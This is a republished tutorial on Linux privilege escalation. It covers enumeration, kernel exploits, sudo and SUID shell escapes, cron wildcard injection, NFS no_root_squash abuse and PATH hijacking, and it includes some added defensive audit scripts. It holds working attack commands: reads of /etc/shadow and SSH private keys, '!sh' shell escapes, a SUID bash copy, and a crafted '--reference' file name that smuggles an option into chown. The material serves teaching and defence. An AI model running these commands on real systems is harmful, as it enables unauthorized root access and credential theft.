Master Linux Privilege Escalation: Techniques, Commands, and Exploits

This comprehensive guide explains Linux privilege escalation, covering horizontal and vertical privilege upgrades, essential information‑gathering commands, kernel vulnerability exploitation, sudo abuse, SUID/SGID misconfigurations, cron job hijacking, NFS weak permissions, and PATH misconfigurations, with practical examples and code snippets for each technique.

ITPUB

0x001 Linux Privilege Escalation Overview

Privilege escalation is the process of gaining higher privileges than originally granted, typically to read/write sensitive files, maintain persistence, or install backdoors. Escalation can be horizontal (between regular users) or vertical (to root/administrator).

Common Techniques

Kernel vulnerabilities

Programs running as root

Installed software with exploitable versions

Weak or reused passwords and plaintext credentials

Misconfigured internal services

SUID/SGID misconfigurations

Abuse of sudo rights

Writable scripts called by root

PATH configuration errors

Cron jobs

0x002 Basic Linux Information Gathering

System Identification

cat /etc/issue
cat /etc/*-release
uname -a
uname -m   # architecture
uname -r   # kernel version

Environment and PATH

env
cat /etc/profile
cat ~/.bashrc
echo $PATH

Running Services

ps aux
ps aux | grep root
netstat -antup

Configuration Files

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/sudoers
crontab -l
cat /etc/crontab

File System Exploration

find / -perm -222 -type d    # world-writable directories
find / -perm -4000 -type f   # SUID binaries
find / -perm -2000 -type f   # SGID binaries
cat /etc/passwd
cat /etc/shadow
cat ~/.ssh/id_rsa

0x003 Automated Enumeration Scripts

LinEnum – https://github.com/rebootuser/LinEnum

Unix‑privesc‑check – http://pentestmonkey.net/tools/audit/unix-privesc-check

Linprivchecker.py – https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py

0x004 Kernel Vulnerability Exploitation

Successful kernel exploitation requires a vulnerable kernel, a matching exploit, the ability to transfer the exploit to the target, and execution rights on the target. Keep kernels patched and limit file‑transfer utilities (ftp, wget, curl) to trusted users.

Kernel Information Commands

uname -a             # full system info
uname -m             # architecture (32/64-bit)
uname -r             # kernel release
cat /proc/version    # kernel version details
cat /etc/*-release   # distribution info

Example: DirtyCow (CVE‑2016‑5195) can replace /etc/passwd entries to create a new root‑privileged user.

0x005 Exploiting Services Running as Root

Identify services that run as root and check for vulnerable binaries or misconfigurations.

ps aux | grep root
netstat -antup

MySQL UDF exploits can execute arbitrary commands if MySQL runs as root.

0x006 SUID/SGID Misconfigurations

SUID allows a binary to run with the file owner’s privileges; SGID does the same for the group. Common exploitable binaries include nmap, vim, find, awk, less, more, cp, mv, nano, and wget.

Finding SUID/SGID Files

find / -perm -4000 -type f 2>/dev/null   # SUID files
find / -perm -2000 -type f 2>/dev/null   # SGID files
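As an added defender-side example (not part of the original article), the following script classifies the output of the SUID search above: it flags the shell-escaping binaries this section names and any SUID file outside the usual package directories, which is exactly what the `cp /bin/bash /tmp/bash && chmod +s` trick leaves behind. The list of "standard" directories is an assumption for illustration; the sample path list is constructed so the check runs offline.

```shell
# Added example, not from the original article: classify SUID paths found by
# find / -perm -4000 -type f. A constructed list stands in for live output.

# Programs named in this section that hand out a shell when SUID/sudo-enabled.
RISKY_BINS="nmap vim find awk less more cp mv nano wget"

# Directories where packages normally install SUID binaries (assumed list).
# A SUID file anywhere else is the artifact of a privilege-escalation attempt.
is_standard_dir() {
    case "$1" in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read SUID paths from stdin; print "RISKY <path>" for known shell-escaping
# binaries and "UNUSUAL <path>" for SUID files outside package directories.
classify_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        base=${path##*/}
        label=""
        for b in $RISKY_BINS; do
            if [ "$base" = "$b" ]; then label=RISKY; break; fi
        done
        if [ -z "$label" ] && ! is_standard_dir "$path"; then
            label=UNUSUAL
        fi
        if [ -n "$label" ]; then printf '%s %s\n' "$label" "$path"; fi
    done
    return 0
}

# Constructed sample standing in for: find / -perm -4000 -type f 2>/dev/null
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/usr/local/bin/nmap
/tmp/bash'

printf '%s\n' "$SAMPLE_SUID" | classify_suid
```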

Typical Escalation Commands

sudo nmap --interactive   # then, at the nmap prompt:
!sh
sudo vim -c '!sh'
sudo less /etc/passwd     # then, inside less:
!/bin/sh
sudo cp /bin/bash /tmp/bash && chmod +s /tmp/bash

0x007 Cron Job Abuse

Cron jobs run scheduled commands, often as root. If a script or binary invoked by a root cron job is writable by a low‑privilege user, the attacker can modify it to gain root.

Discovery Commands

crontab -l
ls -la /etc/cron*
cat /etc/crontab

Example: Overwrite a writable script used by a root cron job, place a set‑uid binary in the same directory, and obtain a root shell.
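An added audit script (not from the original article) for the writable-target problem described above: it reads lines in /etc/crontab format (five time fields, user, command) and reports, for each job, whether the executable or its directory is world-writable. The verdict names are my own; the usage line at the end assumes the system crontab and /etc/cron.d layout.

```shell
# Added example, not from the original article: audit the targets of cron
# jobs. Verdicts: WRITABLE (script itself is world-writable), DIR_WRITABLE
# (its directory is world-writable, so the script, present or missing, can be
# replaced), MISSING (dangling path, directory not writable), RELATIVE
# (resolved through cron's PATH), OK.

# True if the path is world-writable (POSIX find; no GNU stat needed).
world_writable() {
    [ -n "$(find "$1" -prune -perm -002 2>/dev/null)" ]
}

# Read crontab lines from stdin; print "<verdict> <user> <path>" per job.
check_cron_lines() {
    set -f                                  # keep "*" time fields from globbing
    while IFS= read -r line; do
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac   # blank, comment, VAR=
        set -- $line
        case "$1" in
            @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;   # @reboot user cmd
            *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;   # m h dom mon dow user cmd
        esac
        cmd=$1
        case "$cmd" in
            /*) ;;
            *) printf 'RELATIVE %s %s\n' "$user" "$cmd"; continue ;;
        esac
        dir=${cmd%/*}; [ -n "$dir" ] || dir=/
        if world_writable "$cmd"; then verdict=WRITABLE
        elif world_writable "$dir"; then verdict=DIR_WRITABLE
        elif [ ! -e "$cmd" ]; then verdict=MISSING
        else verdict=OK
        fi
        printf '%s %s %s\n' "$verdict" "$user" "$cmd"
    done
    set +f
    return 0
}

# Usage on a live host (assumed layout):
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | check_cron_lines
```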

Wildcard Injection in Cron

# Create a reference file owned by the attacker
touch reference
# Create a crafted file that will be interpreted as a flag
touch -- --reference=reference
# If a later chown command runs with "*", it will affect /etc/passwd via the symlink
ln -s /etc/passwd malicious_link
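Two defender-side counterparts to the wildcard trick above, added here and not part of the original article: a check that lists files in a directory whose names look like command-line options (the planted `--reference=...` file), and the cron-script pattern that never lets a filename reach chown as an option. The directory and owner arguments are the caller's.

```shell
# Added example, not from the original article.

# Print names directly inside $1 that start with "-". Any cron job running
# "chown ... *", "tar ... *" or similar in that directory is exposed.
suspicious_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -exec basename {} \;
}

# Hardened form of "chown -R <owner> *" for a cron script: "--" ends option
# parsing and "./*" anchors every name, so a file named --reference=x is
# passed as ./--reference=x, which chown can only treat as a path.
safe_chown_all() {
    owner=$1; dir=$2
    ( cd "$dir" && chown -R -- "$owner" ./* )
}
```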

0x008 NFS Weak Permissions

If an NFS export is configured with no_root_squash and write permissions, an attacker can mount the share, write a set‑uid binary, and execute it as root.

Typical Workflow

Discover exports: showmount -e [IP]
Mount the share: mount -o rw,vers=2 [IP]:/tmp /tmp/nfs
Create a C program that sets UID to 0 and spawns a shell, compile it, and set the SUID bit.
Execute the binary to obtain a root shell.
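On the server side, the combination to look for is the one this section names: no_root_squash together with write access. The script below is an added example (not from the original article) that parses /etc/exports syntax (`<path> <client>(<opts>) ...`) and reports every client exported with no_root_squash; clients without an option list keep the defaults (ro, root_squash) and are not reported. The severity labels are my own.

```shell
# Added example, not from the original article: audit /etc/exports for
# no_root_squash. CRITICAL when the share is also rw (root on the client can
# write root-owned SUID files into it), WARN when read-only.

# Read /etc/exports lines from stdin; print "<level> <path> <client> <opts>".
audit_exports() {
    set -f                                  # "*" is a common client spec
    while IFS= read -r line; do
        line=${line%%#*}                    # strip comments
        set -- $line
        [ $# -ge 2 ] || continue
        path=$1; shift
        for ent in "$@"; do
            case "$ent" in
                *\(*\)) client=${ent%%\(*}; opts=${ent#*\(}; opts=${opts%\)} ;;
                *) continue ;;              # no option list: defaults apply
            esac
            case ",$opts," in
                *,no_root_squash,*) ;;
                *) continue ;;
            esac
            case ",$opts," in
                *,rw,*) level=CRITICAL ;;
                *) level=WARN ;;
            esac
            printf '%s %s %s %s\n' "$level" "$path" "$client" "$opts"
        done
    done
    set +f
    return 0
}

# Usage on a live NFS server: audit_exports < /etc/exports
```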

0x009 PATH Misconfiguration (".")

Placing a literal dot (.) at the beginning of PATH causes the shell to search the current directory before system directories. An attacker can place a malicious executable named after a common command (e.g., ls) and have it executed with elevated privileges when a privileged user runs the command.

# Example of a vulnerable PATH
PATH=.:$PATH   # Adds '.' at the start
# Attacker creates a malicious 'ls' in their directory
ls   # Executes the attacker's script instead of the legitimate binary

Defence: Do not place '.' at the start of PATH for privileged accounts.
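An added check for this defence (not from the original article). It goes slightly beyond the literal "." case: POSIX also treats an empty PATH element (a leading or trailing ":" or "::") as the current directory, and any relative element is resolved from wherever the user happens to be, so all three are reported. The function and output format are my own.

```shell
# Added example, not from the original article: report PATH elements that
# resolve to the current directory or to a relative location.

# Print "<position> <problem>" for each unsafe element of $1 (defaults to the
# caller's PATH); return 0 if anything was found, 1 if the PATH is clean.
unsafe_path_elements() {
    p=${1-$PATH}
    rest="$p:"                              # trailing ":" so the last element is seen
    pos=1
    found=1
    while [ -n "$rest" ]; do
        el=${rest%%:*}
        rest=${rest#*:}
        case "$el" in
            '') printf '%d empty (current directory)\n' "$pos"; found=0 ;;
            .)  printf '%d . (current directory)\n' "$pos"; found=0 ;;
            /*) ;;                          # absolute, fine
            *)  printf '%d relative: %s\n' "$pos" "$el"; found=0 ;;
        esac
        pos=$((pos + 1))
    done
    return $found
}

# The vulnerable PATH from the example above, then the live one.
unsafe_path_elements '.:/usr/local/bin:/usr/bin:/bin'
unsafe_path_elements || echo "PATH is clean"
```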

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Written by

ITPUB

Official ITPUB account sharing technical insights, community news, and exciting events.